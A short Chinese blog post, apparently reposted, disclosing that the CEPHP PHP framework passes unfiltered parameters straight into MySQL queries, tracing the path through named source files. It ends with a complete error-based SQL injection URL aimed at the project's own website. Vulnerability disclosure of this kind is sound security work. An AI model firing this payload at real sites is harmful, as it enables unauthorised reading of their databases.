某轻量级php框架全站注入
百度搜索轻量级php框架 ,第一个就是这CEPHP,手贱测试下居然存在注入,下载源码居然发现全站涉及数据库操作的全部存在注入,对变量完全没有任何过滤。无语。截图看下:
1、主要文件demo\M\User\student.php
处理是参数没过滤带入Mdb->find函数进行处理,可以看到Mdb,继承自M_User_Student 最终会定位到Cemvc\Db\MysqlDb.php文件,该函数如下:
数据库查询语句也没有任何处理。。。注入产生
http://www.cephp.com/search/1'%20AND%20(SELECT%207552%20FROM(SELECT%20COUNT(*), CONCAT(0x3a666f613a,(SELECT%20(CASE%20WHEN%20(7552=7552)%20THEN%201%20ELSE%200%20END)), 0x3a71777a3a,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a)%20AND%20'PUWw'='PUWw
声明:本文来自网络,不代表【好得很程序员自学网】立场,转载请注明出处:http://haodehen.cn/did14318